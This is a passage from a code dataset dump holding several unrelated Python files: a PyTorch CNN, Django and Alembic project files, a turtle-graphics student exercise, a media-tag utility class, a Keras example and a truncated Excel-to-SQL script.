Bibsonomy.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"538575523","text":"import torch\nimport torch.nn as nn\nimport numpy as np\n\ndef conv3x3(in_planes, out_planes, stride=1):\n \"3x3 convolution with padding\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,\n padding=0, bias=False)\n\nclass ScanNet(nn.Module):\n\n def __init__(self):\n super(ScanNet, self).__init__()\n self.convnet = nn.Sequential(\n conv3x3(in_planes=1, out_planes=32, stride=1),\n nn.ReLU(),\n conv3x3(in_planes=32, out_planes=32, stride=1),\n nn.ReLU(),\n nn.MaxPool2d(3),\n conv3x3(in_planes=32, out_planes=64, stride=1),\n nn.ReLU(),\n conv3x3(in_planes=64, out_planes=64, stride=1),\n nn.ReLU(),\n nn.MaxPool2d(3),\n )\n self.block1 = nn.Sequential(\n conv3x3(in_planes=1, out_planes=16, stride=1),\n conv3x3(in_planes=16, out_planes=16, stride=1),\n nn.ReLU(),\n nn.MaxPool2d(2),\n conv3x3(in_planes=16, out_planes=32, stride=1),\n conv3x3(in_planes=32, out_planes=32, stride=1),\n nn.ReLU(),\n nn.MaxPool2d(2),\n )\n\n self.block2 = nn.Sequential(\n conv3x3(in_planes=1, out_planes=16, stride=1),\n conv3x3(in_planes=16, out_planes=16, stride=1),\n nn.ReLU(),\n nn.MaxPool2d(2),\n conv3x3(in_planes=16, out_planes=32, stride=1),\n conv3x3(in_planes=32, out_planes=32, stride=1),\n nn.ReLU(),\n nn.MaxPool2d(2),\n )\n self.block2 = nn.DataParallel(self.block2)\n\n self.fc = nn.Sequential(\n nn.Linear(1032256, 512),\n nn.Linear(512,512),\n nn.Linear(512, 2)\n )\n\n self.fc512 = nn.Linear(401408, 512)\n self.relu = nn.ReLU()\n self.dropout1 = nn.Dropout(0.1)\n self.fc128 = nn.Linear(512, 128)\n self.dropout2 = nn.Dropout(0.1)\n self.fc64 = nn.Linear(128, 64)\n self.dropout3 = nn.Dropout(0.1)\n self.fc32 = nn.Linear(64,32)\n self.dropout4 = nn.Dropout(0.1)\n self.fc3 = nn.Linear(128,2)\n\n def forward(self, input1, input2):\n\n\n #out1 = self.convnet(input1)\n #out2 = self.convnet(input2)\n out1 = self.block1(input1)\n out2 = self.block2(input2)\n\n out1 = out1.view(out1.size(0), -1)\n out2 = out2.view(out2.size(0), -1)\n\n input = torch.cat((out1, out2), 1)\n\n out = self.fc(input)\n\n return out\n\n\n","sub_path":"ScanNet.py","file_name":"ScanNet.py","file_ext":"py","file_size_in_byte":2515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"26740088","text":"from glob import glob\nimport os\n\nfrom django.core.management.base import BaseCommand, CommandError\nfrom django.conf import settings\n\nfrom ingest import tasks\n\nclass Command(BaseCommand):\n\thelp = 'Creates source data from supplied data, adds source data to database, transforms data and pushes to ES'\n\n\tdef add_arguments(self, parser):\n\t\tparser.add_argument('-n', '--new', dest='new', action='store_true', help='process only new contributions')\n\t\tparser.add_argument('-i', '--inst', dest='inst', help='optional argument for single contributor ingest')\n\n\tdef handle(self, *args, **options):\n\t\tdata_path = settings.DATAPATH\n\t\tes = settings.ES\n\t\tgulpcmd = settings.GULPCMD\n\n\t\tif options['inst'] is not None:\n\t\t\tinst = options['inst']\n\t\telse:\n\t\t\tinst = '*'\n\n\t\tnew_insts = []\n\t\tif options['new'] is True:\n\t\t\tsupplied_dirs = '{}/supplied_data/{}'.format(data_path, inst)\n\t\t\tfor supplied_dir in glob(supplied_dirs):\n\t\t\t\ttasks.create_source(data_path, supplied_dir, es)\n\t\t\t\tnew_insts.append(supplied_dir.split(\"/\")[-1].split(\"_\")[0])\n\t\t\ttasks.build_sitemaps()\n\t\telse:\n\t\t\tinst_dirs = '{}/source_data/{}'.format(data_path, inst)\n\t\t\tfor inst_dir in glob(inst_dirs):\n\t\t\t\tinst = inst_dir.split('/')[-1]\n\t\t\t\tprint(inst)\n\t\t\t\tdate_dirs = '{}/*'.format(inst_dir)\n\t\t\t\tfor date_dir in glob(date_dirs):\n\t\t\t\t\tprint(date_dir)\n\t\t\t\t\ttasks.process_data(inst, date_dir, es)\n\n\t\ttasks.update_date_total(options['new'], new_insts)\n\t\ttasks.clean_rss()\n\n\t\tos.system('gulp clean:config')\n\t\tos.system(gulpcmd)\n","sub_path":"src/server/ingest/management/commands/process_contributions.py","file_name":"process_contributions.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"350787651","text":"\"\"\"empty message\n\nRevision ID: d59ff87ac474\nRevises: c1c48bd92a3f\nCreate Date: 2020-07-27 14:39:16.318386\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'd59ff87ac474'\ndown_revision = 'c1c48bd92a3f'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_unique_constraint(None, 'user', ['username'])\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint(None, 'user', type_='unique')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/d59ff87ac474_.py","file_name":"d59ff87ac474_.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"201621658","text":"#Jake Lorah\r\n#Coded in: Python 3.4.3\r\n#Project2.py\r\n\r\n#Updated changes 10/30/18:\r\n #I changed the name of the methods from forward, backward, left, right, to jakeforward, jakebackward, jakeleft, jakeright.\r\n #I changed the if condition from < (less than) sign to <= (less than or equal to) sign.\r\n #I added a new method from the API list called color. turtle.color(\"black\", \"darkgreen\") changed the color of the turtle to dark green with a black outline.\r\n #I changed the size of the turtle to make it a little bigger.\r\n #I changed penup to pendown so that the turtle's path keeps a trail.\r\n #I changed the background color to dark khaki so that it looks similar to dirty water like a stream or a pond.\r\n #I added a new method from the API list called stamp that prints the turtle on the screen right when you start the program to show where you began as you move the turtle around the world.\r\n #I added a second turtle you can control with the keys: W, A, S, D.\r\n #I changed the dimensions of the screen to be larger.\r\n #I made the color of turtle2 blue with a white outline.\r\n #I changed the speed of both turtles to be a little faster.\r\n\r\n\r\nimport turtle\r\n\r\n#I changed the dimensions of the screen to be larger and more wide.\r\nHEIGHT = 900\r\nWIDTH = 1200\r\nscreen = turtle.Screen()\r\nscreen.setup(WIDTH,HEIGHT)\r\n\r\n#Click the image icon in the top right of the code window to see\r\n#which images are available in this trinket\r\n\r\n#add the shape first then set the turtle shape\r\n\r\nturtle.shape('turtle')\r\n\r\n#I made the size of the turtle larger\r\nturtle.shapesize(2)\r\n\r\n#I made the color of the turtle dark green with a black outline.\r\nturtle.color(\"black\", \"darkgreen\")\r\n\r\n#Prints the turtle on the screen right when you start the program to show where you began as you move the turtle around the world.\r\nturtle.stamp()\r\n\r\n#I changed the background color to dark khaki.\r\nscreen.bgcolor(\"darkkhaki\")\r\n\r\n#I added the clone method which clones the original turtle.\r\nturtle2 = turtle.clone()\r\n\r\n#I made the color of turtle2 blue with a white outline.\r\nturtle2.color(\"white\", \"blue\")\r\n\r\n#I changed the speed of both turtles to be a little faster.\r\nmove_speed = 20\r\nturn_speed = 20\r\n\r\n#these defs control the movement of our \"turtle\"\r\n\r\n#Changed the name of my method to jakeforward.\r\ndef jakeforward():\r\n turtle.forward(move_speed)\r\n x, y = turtle.position()\r\n\r\n #Changed the if condition from < (less than) sign to <= (less than or equal to) sign. \r\n if not -WIDTH / 2 <= x <= WIDTH / 2 or not -HEIGHT / 2 <= y < HEIGHT / 2:\r\n turtle.undo() # undo error\r\n turtle.left(180) # turn around\r\n turtle.forward(10) # redo movement but in new direction\r\n \r\n#Changed the name of my method to jakebackward.\r\ndef jakebackward():\r\n turtle.backward(move_speed)\r\n x, y = turtle.position()\r\n \r\n#Changed the if condition from < (less than) sign to <= (less than or equal to) sign.\r\n if not -WIDTH / 2 <= x <= WIDTH / 2 or not -HEIGHT / 2 <= y < HEIGHT / 2:\r\n turtle.undo() # undo error\r\n turtle.left(180) # turn around\r\n turtle.forward(10) # redo movement but in new direction\r\n\r\n#Changed the name of my method to jakeleft.\r\ndef jakeleft():\r\n turtle.left(turn_speed)\r\n\r\n#Changed the name of my method to jakeright.\r\ndef jakeright():\r\n turtle.right(turn_speed)\r\n\r\n\r\n#Changed the name of my method to jakeforward2.\r\ndef jakeforward2():\r\n turtle2.forward(move_speed)\r\n x, y = turtle2.position()\r\n\r\n #Changed the if condition from < (less than) sign to <= (less than or equal to) sign. \r\n if not -WIDTH / 2 <= x <= WIDTH / 2 or not -HEIGHT / 2 <= y < HEIGHT / 2:\r\n turtle2.undo() # undo error\r\n turtle2.left(180) # turn around\r\n turtle2.forward(10) # redo movement but in new direction\r\n \r\n#Changed the name of my method to jakebackward2.\r\ndef jakebackward2():\r\n turtle2.backward(move_speed)\r\n x, y = turtle2.position()\r\n \r\n#Changed the if condition from < (less than) sign to <= (less than or equal to) sign.\r\n if not -WIDTH / 2 <= x <= WIDTH / 2 or not -HEIGHT / 2 <= y < HEIGHT / 2:\r\n turtle2.undo() # undo error\r\n turtle2.left(180) # turn around\r\n turtle2.forward(10) # redo movement but in new direction\r\n\r\n#Changed the name of my method to jakeleft2.\r\ndef jakeleft2():\r\n turtle2.left(turn_speed)\r\n\r\n#Changed the name of my method to jakeright2.\r\ndef jakeright2():\r\n turtle2.right(turn_speed)\r\n\r\n#Changed penup to pendown so that the turtle's path keeps a trail.\r\nturtle.pendown()\r\nturtle.speed(0)\r\nturtle.home()\r\n\r\n#Changed penup to pendown so that the turtle 2 path keeps a trail.\r\nturtle2.pendown()\r\nturtle2.speed(0)\r\nturtle2.home()\r\n\r\n#now associate the defs from above with certain keyboard events\r\nscreen.onkeypress(jakeforward, \"Up\")\r\n\r\nscreen.onkeypress(jakebackward, \"Down\")\r\nscreen.onkeypress(jakeleft, \"Left\")\r\nscreen.onkeypress(jakeright, \"Right\")\r\n\r\nscreen.onkeypress(jakeforward2, \"w\")\r\n\r\nscreen.onkeypress(jakebackward2, \"s\")\r\nscreen.onkeypress(jakeleft2, \"a\")\r\nscreen.onkeypress(jakeright2, \"d\")\r\nscreen.listen()\r\n","sub_path":"Senior(2018-2019)/Python/Turtle-Methods/10-25-18/Project2.py","file_name":"Project2.py","file_ext":"py","file_size_in_byte":5087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"203698212","text":"from rest_framework import generics, permissions, views\nfrom rest_framework.response import Response\nfrom .models import Question, Choice, Feedback\nfrom .serializers import QuestionSerializer, ChoiceSerializer, FeedbackSerializer\nfrom django.shortcuts import render\n\n\nclass QuestionList(generics.ListCreateAPIView):\n queryset = Question.objects.all()\n #model = Question\n serializer_class = QuestionSerializer\n permission_classes = [\n permissions.AllowAny\n ]\n\nclass QuestionDetail(generics.RetrieveAPIView):\n\tqueryset = Question.objects.all()\n\t#model = Question\n\tserializer_class = QuestionSerializer\n\tlookup_url_kwarg = 'question_pk'\n\tpermission_classes = [\n\t\tpermissions.AllowAny\n\t]\n\nclass ChoiceUpdate(generics.UpdateAPIView):\n\tqueryset = Choice.objects.all()\n\t#model = Choice\n\tserializer_class = ChoiceSerializer\n\tlookup_url_kwarg = 'choice_pk'\n\tpermission_classes = [\n\t\tpermissions.AllowAny\n\t]\n\nclass ChoiceList(generics.ListCreateAPIView):\n queryset = Choice.objects.all()\n #model = Choice\n serializer_class = ChoiceSerializer\n permission_classes = [\n permissions.AllowAny\n ]\n\nclass FeedbackUpdate(generics.UpdateAPIView):\n\tqueryset = Feedback.objects.all()\n\tserializer_class = FeedbackSerializer\n\tlookup_url_kwarg = 'feedback_pk'\n\tpermission_classes = [\n\t\tpermissions.AllowAny\n\t]\n\nclass FeedbackList(generics.ListCreateAPIView):\n queryset = Feedback.objects.all()\n serializer_class = FeedbackSerializer\n permission_classes = [\n permissions.AllowAny\n ]\n\nclass UpvoteApiView(views.APIView):\n\n def post(self, request, *args, **kwargs):\n question = Question.objects.get(id=kwargs['question_pk'])\n if question.upvotes:\n question.upvotes = question.upvotes+1\n else:\n question.upvotes = 1\n question.save()\n return Response({\"question\": question.id, \"upvotes\": question.upvotes, \"success\": True})\n\nclass DownvoteApiView(views.APIView):\n\n def post(self, request, *args, **kwargs):\n question = Question.objects.get(id=kwargs['question_pk'])\n if question.upvotes:\n question.upvotes = question.upvotes-1\n else:\n question.upvotes = -1\n question.save()\n return Response({\"question\": question.id, \"upvotes\": question.upvotes, \"success\": True})\n\ndef index(request):\n return render(request, 'polls/index.html')\n","sub_path":"djangular/polls/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"627808184","text":"import filecmp\nimport os\nimport re\nimport shutil\nimport mutagen\nimport logging\nimport ast\nfrom exiftool import ExifTool\nfrom exiftool import fsencode\nfrom mutagen import asf\nfrom mutagen import mp4\nfrom mutagen.easyid3 import EasyID3\nfrom mutagen.id3 import ID3\nfrom logging.handlers import RotatingFileHandler\nfrom Avatar.get_extensions import GetExtensions\n\n\nclass AvatarFile:\n \"\"\"\n It collects and returns information about a file.\n You will be able to get the type of a file or tags existing within the file.\n Some os functions are incorporated in this module, helping you to delete, rename or move the file\n See \"extension_list.txt\" for a list of extensions accepted\n \"\"\"\n\n def __init__(self, url):\n \"\"\"\n :param url: file url\n \"\"\"\n self.url = url\n self.list_mp3_tag = ['mp3']\n self.list_mp4_tag = ['mp4', 'm4a']\n self.tag_info = {\n 'pdf': {'extension': ('extension', False), 'title': ('PDF:Title', True), 'constructor':\n ('constructor', False), 'size': ('size', False), 'total_ext': ('total_ext', False), 'producer':\n ('PDF:Producer', True), 'resume': ('PDF:Subject', True), 'author': ('XMP:Author', True), 'type':\n ('type', False)}, 'asf_tag': {'subtitle': ('WM/SubTitle', True), 'buffer average':\n ('Buffer Average', True), 'publisher': ('WM/Publisher', True), 'description':\n ('Description', True), 'content distributor': ('WM/ContentDistributor', True), 'period':\n ('WM/Period', True), 'part of set': ('WM/PartOfSet', True), 'director': ('WM/Director', True), 'extension':\n ('extension', False), 'promotion url': ('WM/PromotionURL', True), 'constructor':\n ('constructor', False), 'genres': ('WM/Genre', True), 'parental rating':\n ('WM/ParentalRating', True), 'author url': ('WM/AuthorURL', True), 'producer':\n ('WM/Producer', True), 'artists': ('Author', True), 'conductor': ('WM/Conductor', True), 'beats per minute':\n ('WM/BeatsPerMinute', True), 'title': ('Title', True), 'encoded by': ('WM/EncodedBy', True), 'initial key':\n ('WM/InitialKey', True), 'album title': ('WM/AlbumTitle', True), 'category': ('WM/Category', True),\n 'total_ext': ('total_ext', False), 'copyright': ('Copyright', True), 'size': ('size', False), 'composer':\n ('WM/Composer', True), 'tag': ('Tagg', True), 'type': ('type', False), 'album artist':\n ('WM/AlbumArtist', True)}, 'mp4': {'artists': ('symART', True), 'title': ('symnam', True), 'comment':\n ('symcmt', True), 'total_ext': ('total_ext', False), 'subtitle': ('Subt', True), 'extension':\n ('extension', False), 'constructor': ('constructor', False), 'size': ('size', False), 'composer':\n ('symwrt', True), 'date': ('symday', True), 'genres': ('symgen', True), 'type': ('type', False)}, 'mp3':\n {'disc number': ('discnumber', True), 'artists': ('artist', True), 'subtitle':\n ('version', True), 'conductor': ('conductor', True), 'publisher':\n ('organization', True), 'beats per minute': ('bpm', True), 'total_ext': ('total_ext', False), 'encoded by':\n ('encodedby', True), 'type': ('type', False), 'title': ('title', True), 'track number':\n ('tracknumber', True), 'extension': ('extension', False), 'constructor':\n ('constructor', False), 'size': ('size', False), 'composer': ('composer', True), 'date':\n ('date', True), 'genres': ('genre', True), 'author url': ('website', True), 'album':\n ('album', True), 'album artist': ('performer', True)}}\n\n def __eq__(self, other):\n if isinstance(other, AvatarFile):\n return self.get_contain() == other.get_contain()\n else:\n return False\n\n def __ne__(self, other):\n if isinstance(other, AvatarFile):\n return not self.get_contain() == other.get_contain()\n else:\n return True\n\n def __hash__(self):\n return hash(self.get_contain())\n\n def exists(self):\n return os.path.exists(self.url)\n\n def get_types(self):\n \"\"\"\n :return: file extension, file total_ext, file_type, maker\n \"\"\"\n ext_dict = GetExtensions.get_extensions()\n extension = self.get_extension()\n total_ext = ext_dict[self.get_extension()][0]\n file_type = ext_dict[self.get_extension()][2]\n maker = ext_dict[self.get_extension()][1]\n return extension, total_ext, file_type, maker\n\n def get_extension(self):\n return self.url.split('.')[-1].lower()\n\n def is_same(self, file_cmp):\n return filecmp.cmp(self.url, file_cmp)\n\n def move(self, destination):\n \"\"\"\n :param destination: folder url\n \"\"\"\n destination = os.path.join(destination, os.path.basename(self.url))\n destination = control_duplicate_name(destination, 1)\n\n try:\n os.renames(self.url, destination)\n except TypeError as e:\n logger.error(e)\n pass\n\n return destination\n\n def move_by_tag(self, dir_selected, standard):\n \"\"\"\n :param dir_selected: folder destination\n :param standard: how the file should be moved. A string is expected an coma will help to split different value\n example: standard could be 'Genres,Artist,Album'\n \"\"\"\n list_tag = []\n forbidden = [',', ':', '/', '*', '?', '<', '>', '|', '\\\\', '.', '\"']\n\n for element in standard:\n try:\n tag = self.get_tag(element)\n tag = tag[0] if len(tag) == 1 else tag\n for item in forbidden:\n if item in tag:\n tag = str(tag).replace(item, ' ')\n list_tag.append(tag.strip())\n except (TypeError, IndexError) as e:\n logger.info('{}'.format(e))\n logger.info('{file} {tag} Valeur spécifiée non reconnue. Un dossier '\n '/correspondant -unknown- sera crée'.format(file=self.get_url(), tag=element))\n list_tag.append('unknown {}'.format(element))\n continue\n\n sub_folders = list_tag\n dir_destination = os.path.join(dir_selected, *sub_folders)\n try:\n self.move(dir_destination)\n except (PermissionError, FileNotFoundError, TypeError) as e:\n logger.error('{}'.format(e))\n\n def move_by_char(self, dir_selected, standard):\n\n forbidden = [',', ':', '/', '*', '?', '<', '>', '|', '\\\\', '.', '\"']\n sub_folders = standard\n dir_destination = os.path.join(dir_selected, *sub_folders)\n for item in forbidden:\n dir_destination = dir_destination.replace(item, ' ')\n dir_destination = dir_destination.strip()\n try:\n self.move(dir_destination)\n except (PermissionError, FileNotFoundError, TypeError) as e:\n logger.error('{}'.format(e))\n\n def rename(self, new_name):\n src_folder = os.path.dirname(self.url)\n new_name = \"{new_name}.{ext}\".format(new_name=new_name, ext=self.get_extension())\n destination = os.path.join(src_folder, new_name)\n destination = control_duplicate_name(destination, 1)\n shutil.move(self.url, destination)\n\n def rename_with_tag(self, tag_list):\n\n value_list = ''\n for tag in tag_list:\n tag_value = self.get_tag(tag)\n value_list = '{value_list} {tag_value}'.format(value_list=value_list, tag_value=tag_value)\n value_list = value_list.strip()\n value = '{tag}.{extension}'.format(tag=value_list, extension=self.get_extension())\n self.rename(value)\n\n def delete(self):\n try:\n os.remove(self.url)\n except PermissionError as e:\n logger.error(e)\n\n def get_name(self):\n return os.path.basename(self.url)\n\n def get_url(self):\n return self.url\n\n def get_tag(self, tag):\n \"\"\"\n :param tag: tag name. Can be metadata like the title of a song a extern data like the type of the file\n :return: tag value\n example: a file corresponding to Bad-Michael Jackson could return \"Michael Jackson\" if the artist name is asked\n \"\"\"\n\n if tag == 'type':\n try:\n return self.get_types()[2]\n except TypeError as e:\n logger.error(e)\n pass\n\n elif tag == 'total_ext':\n try:\n return self.get_types()[1]\n except TypeError as e:\n logger.error(e)\n pass\n\n elif tag == 'constructor':\n try:\n return self.get_types()[3]\n except TypeError as e:\n logger.error(e)\n pass\n\n elif tag == 'extension':\n return self.get_extension()\n\n elif tag == 'size':\n return os.path.getsize(self.url)\n\n else:\n tag = self.translator_get_trad(tag)\n if self.get_extension() == 'mp3':\n try:\n ID3(self.url).update_to_v23()\n file = EasyID3(self.url)\n return file.get(tag)\n except (AttributeError, PermissionError, mutagen.id3._util.ID3NoHeaderError) as e:\n logger.error(e)\n pass\n\n elif self.get_extension() == 'mp4' or self.get_extension() == 'm4a':\n try:\n file = mp4.Open(self.url)\n return file.get(tag)\n except mutagen.mp4.MP4StreamInfoError as e:\n logger.error(e)\n pass\n\n elif self.get_extension() == 'wmv' or self.get_extension() == 'wma':\n file = asf.Open(self.url)\n return file.get(tag)\n\n elif self.get_extension() == 'pdf':\n with ExifTool() as et:\n file = et.get_metadata(self.url)\n return file.get(tag)\n\n def change_tag(self, tag, tag_value):\n \"\"\"\n :param tag: tag name\n :param tag_value: tag value wanted\n change a tag value to another. only intern data can be changed. See the documentation for a list of tag expected\n \"\"\"\n\n if self.is_tag_editable(tag):\n tag = self.translator_get_trad(tag)\n if self.get_extension() == 'wmv' or self.get_extension() == 'wma':\n file = asf.Open(self.url)\n file[tag] = tag_value\n try:\n file.save()\n except PermissionError as e:\n logger.error(e)\n\n elif self.get_extension() == 'mp4' or self.get_extension() == 'm4a':\n try:\n file = mp4.Open(self.url)\n file[str(tag)] = tag_value\n file.save()\n except (PermissionError, mutagen.mp4.MP4StreamInfoError, IOError) as e:\n logger.error(e)\n\n elif self.get_extension() == 'mp3':\n try:\n ID3(self.url).update_to_v23()\n ID3(self.url).save()\n file = EasyID3(self.url)\n file[tag] = tag_value\n file.save()\n except (mutagen.id3._util.ID3NoHeaderError, PermissionError, IOError) as e:\n logger.error(e)\n return\n\n elif self.get_extension() == 'pdf':\n with ExifTool() as et:\n params = map(fsencode, ['-' + tag + '=' + \"%s\" % tag_value, '%s' % self.url])\n et.execute(*params)\n\n def get_all_tag(self):\n \"\"\"\n :return: will give a list of tag tuple (tag_name, tag_value) existing in the file\n \"\"\"\n result = []\n try:\n for element in self.translator_accept_tag():\n result.append((element, self.get_tag(element)))\n return result\n except TypeError as e:\n logger.error(e)\n pass\n\n def get_all_tag_keys(self):\n \"\"\"\n :return: will give a key list of existing tags in the file\n \"\"\"\n result = []\n try:\n for element in self.translator_accept_tag():\n result.append(element)\n except TypeError as e:\n logger.error(e)\n pass\n return result\n\n def is_tag_editable(self, tag):\n if self.get_extension() in self.list_mp4_tag:\n return self.tag_info['mp4'][tag][1]\n elif self.get_extension() == 'wma' or self.get_extension() == 'wmv':\n return self.tag_info['asf_tag'][tag][1]\n elif self.get_extension() == 'pdf':\n return self.tag_info['pdf'][tag][1]\n elif self.get_extension() in self.list_mp3_tag:\n return self.tag_info['mp3'][tag][1]\n\n def is_ext_accepted(self):\n \"\"\"\n :return: True if the file has an accepted extension.\n \"\"\"\n\n ext_dict = GetExtensions.get_extensions()\n if self.get_extension() in ext_dict.keys():\n return True\n\n def is_matching_by_size(self, mini, maxi):\n if mini < self.get_tag('size') < maxi:\n return True\n else:\n return False\n\n def is_matching_by_attribute(self, tag_name, tag_value):\n if self.get_tag(tag_name) == tag_value:\n return True\n else:\n return False\n\n def is_matching_by_name(self, value):\n text = value.lower()\n text = text.split(' ')\n text = '.*' + '.*'.join(text) + '.*'\n if re.match(text, self.get_name().lower()):\n return True\n else:\n return False\n\n def is_tag_list_accepted(self, tag_list):\n key = self.get_all_tag_keys()\n for element in tag_list:\n if element not in key:\n return False\n return True\n\n def get_contain(self):\n with open(self.url, 'rb') as contain:\n return contain.read()\n\n def translator_get_trad(self, tag):\n try:\n if self.get_extension() in self.list_mp4_tag:\n if 'sym' in self.tag_info[self.get_extension()][tag][0]:\n return self.tag_info['mp4'][tag][0].replace('sym', '©')\n elif self.get_extension() == 'wma' or self.get_extension() == 'wmv':\n return self.tag_info['asf_tag'][tag][0]\n elif self.get_extension() == 'pdf':\n return self.tag_info['pdf'][tag][0]\n elif self.get_extension() in self.list_mp3_tag:\n return self.tag_info['mp3'][tag][0]\n except KeyError as e:\n logger.error(e)\n \n def translator_accept_tag(self):\n if self.get_extension() in self.list_mp4_tag:\n return self.tag_info['mp4']\n elif self.get_extension() == 'wmv' or self.get_extension() == 'wma':\n return self.tag_info['asf_tag']\n elif self.get_extension() == 'pdf':\n return self.tag_info['pdf']\n elif self.get_extension() in self.list_mp3_tag:\n return self.tag_info['mp3']\n\n\ndef control_duplicate_name(name, i):\n\n if os.path.exists(name):\n name_split = name.split('.')\n new_name = '{url_no_ext}-Copie {count}.{ext}'.format(url_no_ext='.'.join(name_split[0:-1]),\n count=i, ext=name_split[-1])\n i += 1\n if os.path.exists(new_name):\n return control_duplicate_name(name, i)\n else:\n return new_name\n else:\n return name\n\nformatter_info = logging.Formatter(\"%(asctime)s -- %(name)s -- %(levelname)s -- %(message)s\")\nlogger = logging.getLogger(\"avatar_file_log\")\nhandler_info = logging.handlers.RotatingFileHandler(\"avatar_file.log\", mode=\"a\", maxBytes=1000000, backupCount=1,\n encoding=\"utf-8\")\nhandler_info.setFormatter(formatter_info)\nlogger.addHandler(handler_info)\nlogger.addHandler(handler_info)\nlogger.setLevel(logging.DEBUG)\n","sub_path":"Avatar/avatar_file.py","file_name":"avatar_file.py","file_ext":"py","file_size_in_byte":16116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"307490074","text":"# 层对象接受张量为参数,返回一个张量。\n# 输入是张量,输出也是张量的一个框架就是一个模型,通过Model定义。\n# 这样的模型可以被像Keras的Sequential一样被训练\nfrom tensorflow.keras.layers import Input, Dense\nfrom tensorflow.keras.models import Model\n\n# This returns a tensor\ninputs = Input(shape=(784,))\n\n# a layer instance is callable on a tensor, and returns a tensor\nx = Dense(64, activation='relu')(inputs)\nx = Dense(64, activation='relu')(x)\npredictions = Dense(10, activation='softmax')(x)\n\n# This creates a model that includes\n# the Input layer and three Dense layers\nmodel = Model(inputs=inputs, outputs=predictions)\nmodel.compile(optimizer='rmsprop',\n loss='categorical_crossentropy',\n metrics=['accuracy'])\nmodel.fit(data, labels) # starts training\n# ----------------------------------------------------\n# # 所有的模型都是可调用的,就像层一样\n# # 利用函数式模型的接口,我们可以很容易的重用已经训练好的模型:\n# # 你可以把模型当作一个层一样,通过提供一个tensor来调用它。\n# # 注意当你调用一个模型时,你不仅仅重用了它的结构,也重用了它的权重。\n# x = Input(shape=(784,))\n# # # This works, and returns the 10-way softmax we defined above.\n# y = model(x)\n# -----------------------------------------------------------\n# # 这种方式可以允许你快速的创建能处理序列信号的模型,\n# # 你可以很快将一个图像分类的模型变为一个对视频分类的模型,只需要一行代码:\n# from tensorflow.keras.layers import TimeDistributed\n\n# # Input tensor for sequences of 20 timesteps,\n# # each containing a 784-dimensional vector\n# input_sequences = Input(shape=(20, 784))\n\n# # This applies our previous model to every timestep in the input sequences.\n# # the output of the previous model was a 10-way softmax,\n# # so the output of the layer below will be a sequence of 20 vectors of size 10.\n# processed_sequences = TimeDistributed(model)(input_sequences)","sub_path":"keras/functional-example/full-connect-net.py","file_name":"full-connect-net.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"547216610","text":"#!/usr/bin/env python3\nimport re\nimport datetime\nimport openpyxl\nimport sqlescapy\nimport logging\nimport time\n\nkezd = time.time()\n\nlogging.basicConfig(level=logging.DEBUG, format=' %(asctime)s - %(message)s')\nlogging.disable(logging.DEBUG) # Akkor kell ha már nem akarunk Debuggolni. :-)\nlogging.disable(logging.INFO)\nlogging.info('Program elkezdődött.')\n\nbem = \"../xlsxs/2021. AUTENTIKUS.xlsx\"\nkim = \"../sql/2021_Autentikus.sql\"\nsql = ''\nhonapok = ['JANUÁR', 'FEBRUÁR', 'MÁRCIUS', 'ÁPRILIS', 'MÁJUS',\n 'JÚNIUS', 'JÚLIUS', 'AUGUSZTUS', 'SZEPTEMBER', 'OKTÓBER',\n 'NOVEMBER', 'DECEMBER']\nf = open(kim, 'w', encoding='utf8')\nf.write('# Honvédelmi adatok 2021-re az autentikusból\\n')\nf.write('# Készítette: Konta Boáz (kontab6@gmail.com).\\n')\nf.write('USE honved2;\\n')\nprint('Bemeneti fájl: ' + bem)\nprint('Kimenetei fájl: ' + kim)\nwb = openpyxl.load_workbook(filename=bem, read_only=True)\n# read_only elvileg gyorsabb és amúgy sem akarunk írni bele.\nfor sh in wb.worksheets: # Végigmegyünk a munkafüzet lapjain\n cells = sh['A2':'I210'] # I210 a vége\n i = 0\n ''' Az értékek a következők:\n c1 - Dátum ( óraperc nélkül )\n c2 - Tánckar és Zenekar\n c3 - Zenekar önálló\n c4 - Férfikar\n c5 - Közreműködők egyeztetés alatt\n c6 - Kontakt\n c7 - Státusz\n c8 - Külsős szállítás\n c9 - megjegyzés\n Ezek a 2021_AUTENTIKUS.xlsx táblázat fejlécsorának összetevői.\n Továbbá! Közhírré tétetik!\n Az excel fileban a dátum mezőt tessék rendesen beállítani.\n '''\n print(\"Munkalap neve: \", sh.title)\n for c1, c2, c3, c4, c5, c6, c7, c8, c9 in cells:\n if c1.value and c2.value: # dátum tánckar kitöltve\n if isinstance(c1.value, datetime.date):\n print('Ejsze, egyszer aztán igen léfutottam he.')\n d = c1.value.strftime('%Y-%m-%d') # d = datum\n elif c1.value not in honapok:\n d = c1.value[0:6].replace(' ', '')\n d = d[0:5].replace('.', '-')\n logging.info('Ezek az érdekes dátumok: {}'.format(d))\n # d = c1.value[0:6].replace('.', '-')\n d = '2021-' + d.strip()\n # ha string => .->- és marad az első 10 karakter\n logging.debug('Datum mező:{} , típusa:{} '.format(d, type(d)))\n logging.debug('''Változók értéke:\n Dátum: {}\n Tánc: {}\n Zkr: {}\n FFikar: {}\n Egyeztet: {}\n Kontakt: {}\n Státusz: {}\n Külszáll: {}\n Megjegy: {}'''\n .format(c1.value, c2.value, c3.value, c4.value, 